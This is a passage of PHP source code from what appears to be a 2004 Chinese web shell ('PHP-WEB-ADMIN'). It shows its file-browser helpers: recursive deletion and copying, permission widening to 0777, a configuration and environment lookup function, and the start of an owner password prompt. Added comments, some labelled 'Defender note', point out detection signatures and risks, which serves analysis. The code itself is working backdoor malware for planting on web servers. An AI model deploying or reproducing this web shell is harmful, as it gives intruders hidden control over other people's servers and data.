 echo "错误的提交参数</td></tr><tr><td align=\"center\" bgcolor=\"#EEEEEE\"><br><a href=\"?action=dir&dir=".urlencode($dir)."\">点此返回文件浏览页面</a><p></td></tr></table>";
}echoend();@ob_end_flush();?>

<?

/**
 * Recursively removes backslash escaping from the string values of an array.
 *
 * The array is received by reference, modified in place and also returned.
 * An entry is processed only when its key is not entirely upper-case or is an
 * integer-like key, and the key is neither 'argc' nor 'argv'; every other
 * entry is left untouched.
 *
 * NOTE(review): each() was removed in PHP 8.0, so this helper only runs on
 * older interpreters.
 * NOTE(review): the loose `!=` against 'argc'/'argv' means integer key 0
 * compares equal to those strings on PHP < 8, so element 0 of a list is
 * presumably skipped; confirm on the runtime in question.
 *
 * @param array $array Array to clean; changed through the reference.
 * @return array The same array after processing.
 */
function array_stripslashes(&$array) {
    // each() walks the array's internal pointer; no reset() is issued first.
    while(list($key,$var) = each($array)) {
        // Skips all-upper-case non-numeric keys plus argc/argv
        // (presumably server/environment style entries; TODO confirm).
        if ((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv') {
            if (is_string($var)) $array[$key] = stripslashes($var);
            // $var is a copy of the nested array; the cleaned copy is stored back.
            if (is_array($var)) $array[$key] = array_stripslashes($var); 
        }
    }
    return $array;
}

/**
 * Recursively deletes a directory tree: every file and sub-directory found
 * under $TagDir, then $TagDir itself.
 *
 * Each entry is chmod'ed to 0777 before it is removed, and every filesystem
 * call carries the @ operator, so a failure raises no PHP warning; the only
 * failure signal is the false return value.
 *
 * Defender note: this function performs no check that $TagDir lies under any
 * particular base directory, so its reach is limited only by the OS
 * permissions of the account PHP runs as. In host audit data, a run of
 * chmod-to-0777 calls each followed directly by unlink/rmdir from the
 * web-server account is a useful signal for this routine.
 *
 * @param string $TagDir Directory to remove.
 * @return bool true when the whole tree was removed, false at the first
 *              unlink()/rmdir() that fails.
 */
function deltree($TagDir){
 $mydir=@opendir($TagDir);
 // The loop ends on the first falsy readdir() result. That is normally
 // end-of-directory, but an entry literally named "0" is falsy too, so the
 // deletion can stop early and leave remnants behind (relevant for forensics).
 while($file=@readdir($mydir)){
  if((is_dir("$TagDir/$file")) && ($file!=".") && ($file!="..")) {
   // Sub-directory: recurse. The early return leaves $mydir open.
   if(!deltree("$TagDir/$file")) return false;
  }else if(!is_dir("$TagDir/$file")){
   // Non-directory entry: widen permissions first, then delete.
   @chmod("$TagDir/$file", 0777);
   if(!@unlink("$TagDir/$file")) return false;
  }
 }
 @closedir($mydir);
 // The directory itself is also set to 0777 before removal.
 @chmod("$TagDir", 0777);
 if(!@rmdir($TagDir)) return false;
 return true;
}

/**
 * Recursively copies the contents of directory $dirf into directory $dirt.
 *
 * Missing sub-directories are created under $dirt as they are met; $dirt
 * itself is not created here. Existing destination files are passed straight
 * to copy(), with no prior existence check in this function. All filesystem
 * calls carry the @ operator, so failures raise no PHP warning and are
 * reported only through the false return value.
 *
 * NOTE(review): the directory handle is never closed (there is no closedir()
 * call), and the loop ends on the first falsy readdir() result, which
 * includes an entry literally named "0".
 *
 * @param string $dirf Source directory.
 * @param string $dirt Destination directory.
 * @return bool true when every entry was copied, false at the first failed
 *              mkdir()/copy() or failed recursive call.
 */
function copydir($dirf,$dirt){
    $mydir=@opendir($dirf);
    while($file=@readdir($mydir)){
        if((is_dir("$dirf/$file")) && ($file!=".") && ($file!="..")) {
            // Create the matching destination sub-directory only if it is absent.
            if(!file_exists("$dirt/$file")) if(!@mkdir("$dirt/$file")) return false;
            if(!copydir("$dirf/$file","$dirt/$file")) return false;
        // "." and ".." are directories, so they fall through both branches.
        }else if(!is_dir("$dirf/$file")) if(!@copy("$dirf/$file","$dirt/$file")) return false;
    }
    return true;
}

/**
 * Ensures that $path exists, creating missing parent directories first.
 *
 * Despite its name the function returns a boolean, not a path. It recurses on
 * dirname($path) until it reaches something that exists, then creates each
 * missing level with mkdir() on the way back. mkdir() is called without a mode
 * argument, so PHP's default mode (subject to the process umask) applies.
 * Warnings from dirname()/mkdir() are suppressed with @.
 *
 * @param string $path Path that should exist once the call returns.
 * @return bool true if $path already existed or was created, false if any
 *              level could not be created.
 */
function truepath($path){
 // Anything that already exists (file or directory) counts as success.
 if(file_exists($path)) return true; 
 else{
  // Make sure the parent exists before creating this level.
  if(truepath(@dirname($path))){
   if(@mkdir($path)) return true;
   else return false;
  }else return false;
 }
}

/**
 * Returns the time elapsed since the moment recorded in the global
 * $pagestarttime.
 *
 * The global is split on a space and its two parts are subtracted from the
 * two parts of a fresh microtime() string (presumably it was set from
 * microtime() earlier in the script; verify where it is assigned).
 *
 * Side effect: the global $pagestarttime is overwritten with the exploded
 * array, so it no longer holds the original string after the first call.
 *
 * @return float|int Elapsed time in seconds.
 */
function getpageruntime(){
    global $pagestarttime;
    // Replace the stored string by its two space-separated parts.
    $pagestarttime = explode(' ', $pagestarttime);
    $finish = explode(' ', @microtime());
    // Same left-to-right order as a single expression: first-part delta,
    // plus the current second part, minus the stored second part.
    $firstPartDelta = $finish[0] - $pagestarttime[0];
    return ($firstPartDelta + $finish[1] - $pagestarttime[1]);
}

/**
 * Prints the page footer: the elapsed time reported by getpageruntime(),
 * followed by the tool's name and attribution banner.
 *
 * Defender note: the banner text emitted here is fixed, so it is the same in
 * every response this script produces and in every unmodified copy of the
 * file. That makes it a convenient static string for file-content and
 * response-body signatures.
 *
 * @return void
 */
function echoend(){
    echo "<br><center>页面执行时间:".getpageruntime()." 秒<br>".
    "<span class = \"stylebtext2\">PHP-WEB-ADMIN(hopol版本)</span><br>脚本由 飘忽的幽灵 提供 <br>".
    "Copyright (C) 2004 www.18883.com All Rights Reserved.</center>";
}

/**
 * Resolves $path with realpath() and returns it with forward slashes.
 *
 * Backslashes in the resolved path are replaced by "/" so Windows and Unix
 * paths are displayed the same way. realpath() warnings are suppressed; its
 * result is handed to str_replace() without a failure check.
 *
 * @param string $path Path to canonicalise.
 * @return string Canonical path using "/" as the separator.
 */
function gettruepath($path){
    $resolved = @realpath($path);
    $normalised = str_replace("\\", "/", $resolved);
    return $normalised;
}

/**
 * Looks up one name through one of five PHP introspection calls and maps the
 * result to a display value.
 *
 * $tp selects the call: 1 get_cfg_var(), 2 function_exists(),
 * 3 get_magic_quotes_gpc(), 4 get_magic_quotes_runtime(), 5 getenv(); any
 * other value produces the string "error!". Every call carries the @ operator.
 *
 * The result is then compared loosely: a value == 1 returns the global $rny,
 * a value == 0 returns the global $rnn, and anything else is returned as is.
 * $rny and $rnn are defined outside this block (presumably yes/no markers;
 * verify where they are assigned).
 *
 * NOTE(review): on PHP < 8 a non-numeric string compares == 0, so textual
 * settings would be replaced by $rnn there; confirm on the runtime in
 * question. The two get_magic_quotes_*() functions take no argument and were
 * removed in PHP 8.0.
 *
 * Defender note: the visible caller passes pieces of $envname, which it takes
 * from the page's own form field, and echoes the return value into HTML with
 * no escaping. The function itself only reads configuration and environment
 * data, so its use shows up as information disclosure, not as a change on
 * the host.
 *
 * @param string $getname Name of the setting, function or environment variable.
 * @param int    $tp      Lookup method selector, 1 to 5.
 * @return mixed $rny, $rnn, or the raw lookup result.
 */
function my_func($getname,$tp){
 global $rny, $rnn;
 // Nested ternary: the first matching $tp decides which lookup runs.
 $out = ($tp==1)?@get_cfg_var($getname):(($tp==2)?@function_exists($getname):(($tp==3)?@get_magic_quotes_gpc($getname):(($tp==4)?@get_magic_quotes_runtime($getname):(($tp==5)?@Getenv($getname):"error!"))));
 // Loose comparisons: truthy-as-1 maps to $rny, falsy-as-0 maps to $rnn.
 return ($out == 1)?$rny:(($out == 0)?$rnn:$out);
}

/**
 * Alternates between the two table row background colours.
 *
 * @param mixed $c Colour used for the previous row.
 * @return string "#EEEEEE" when $c loosely equals "#CCCCCC", otherwise "#CCCCCC".
 */
function ch_color($c){
 if ($c == "#CCCCCC") {
  return "#EEEEEE";
 }
 return "#CCCCCC";
}

function getloginpass(){
 ?>
 <br><br><br><br><br><br><br>
 <table align="center" width="300" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td align="center" bgcolor="#000000" class="stylebtext3">
            幽灵老大,您回来了,请输入密码:
        </t